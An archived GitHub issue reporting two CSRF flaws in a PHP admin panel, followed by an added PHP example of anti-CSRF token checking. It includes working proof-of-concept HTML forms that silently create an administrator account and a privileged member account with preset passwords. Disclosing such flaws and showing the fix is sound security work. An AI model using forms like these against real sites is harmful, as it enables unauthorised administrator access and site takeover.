This repository was archived by the owner on Apr 14, 2021. It is now read-only.

There are two CSRF vulnerabilities that can add an administrator account #20

Closed
@FiveAourThe


After the administrator has logged in, open the following two pages.
PoC:
add_admin.html

<html>
<form action="http://127.0.0.1/admin.php?m=Admin&c=manager&a=add" method="post">
	<div class="form-group">
		<label>用户名</label>
		<input class="form-control" type="text" name="username" value="csrf">
	</div>
	<div class="form-group">
		<label>邮箱</label>
		<input class="form-control" type="text" name="email" value="csrf@test.com">
	</div>
	<div class="form-group">
		<label>密码</label>
		<input class="form-control" type="password" name="password" value="123456">
	</div>
	<div class="form-group">
		<label>确认密码</label>
		<input class="form-control" type="password" name="repassword" value="123456">
	</div>
	<div class="form-group">
		<button class="btn btn-success" type="submit" >添加</button>
	</div>


</form>
</html>

add_user.html

<html>
<form action="http://127.0.0.1/admin.php?m=Admin&c=member&a=add" method="post">
	<div class="form-group">
		<label>用户名</label>
		<input class="form-control" type="text" name="username" value="test">
	</div>
	<div class="form-group">
		<label>邮箱</label>
		<input class="form-control" type="text" name="email" value="test@test.com">
	</div>
	<div class="form-group">
		<label>密码</label>
		<input class="form-control" type="password" name="password" value="123456">
	</div>
	<div class="form-group">
		<label>确认密码</label>
		<input class="form-control" type="password" name="repassword" value="123456">
	</div>
	<div class="form-group">
        <label>用户等级</label>
        <label class="radio-inline">
          <input type="radio" name="type" id="type" value="1" >路人
        </label>
        <label class="radio-inline">
          <input type="radio" name="type" id="type" value="2" >实习白帽子
        </label>
		<label class="radio-inline">
          <input type="radio" name="type" id="type" value="3" >普通白帽子
        </label>
        <label class="radio-inline">
          <input type="radio" name="type" id="type" checked="checked" value="4" >核心白帽子
        </label>
    </div>
	<div class="form-group">
        <label>用户状态</label>
        <label class="radio-inline">
          <input type="radio" name="status" id="status" value="0">禁止登陆
        </label>
        <label class="radio-inline">
          <input type="radio" name="status" id="status" value="1"  checked="checked">正常
        </label>
    </div>
	<div class="form-group">
		<button class="btn btn-success" type="submit" >添加</button>
	</div>


</form>
</html>
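Both forms above succeed because the add actions accept any POST that arrives with the administrator's session cookie. As an added example (not code from this repository or from the reporter), here is a per-session anti-CSRF token check of the kind those actions would need; the function names and the `csrf_token` field name are hypothetical, and the request data is constructed so the script runs from the PHP CLI.

```php
<?php
// Added example, not the project's code. All function names are hypothetical.

// Return the per-session token, creating it on first use.
function csrf_token(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

// Hidden field to embed in the application's own add-manager / add-member forms.
function csrf_field(array &$session): string
{
    return '<input type="hidden" name="csrf_token" value="'
        . htmlspecialchars(csrf_token($session), ENT_QUOTES) . '">';
}

// True only for a POST whose body carries the token stored in the session.
function csrf_verify(array $session, string $method, array $post): bool
{
    if ($method !== 'POST') {
        return false;
    }
    $expected = $session['csrf_token'] ?? '';
    $supplied = $post['csrf_token'] ?? '';
    // hash_equals compares in constant time; an empty or missing token never passes.
    return is_string($supplied) && $expected !== ''
        && hash_equals($expected, $supplied);
}

// Constructed data. In the application these would be $_SESSION,
// $_SERVER['REQUEST_METHOD'] and $_POST at the top of each add action.
$session = [];
$token   = csrf_token($session);

// Body as sent by the cross-site form in the report: it cannot know the token.
$crossSite = ['username' => 'csrf', 'email' => 'csrf@test.com',
              'password' => '123456', 'repassword' => '123456'];
// Body as sent by the application's own form, which includes csrf_field().
$sameSite  = $crossSite + ['csrf_token' => $token];

foreach (['cross-site form' => $crossSite, 'own form' => $sameSite] as $name => $post) {
    echo $name, ': ', csrf_verify($session, 'POST', $post) ? 'accepted' : 'rejected', PHP_EOL;
}
```

Setting the session cookie's `SameSite` attribute to `Lax` or `Strict` is a complementary control, since browsers then withhold the cookie from cross-site form POSTs.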
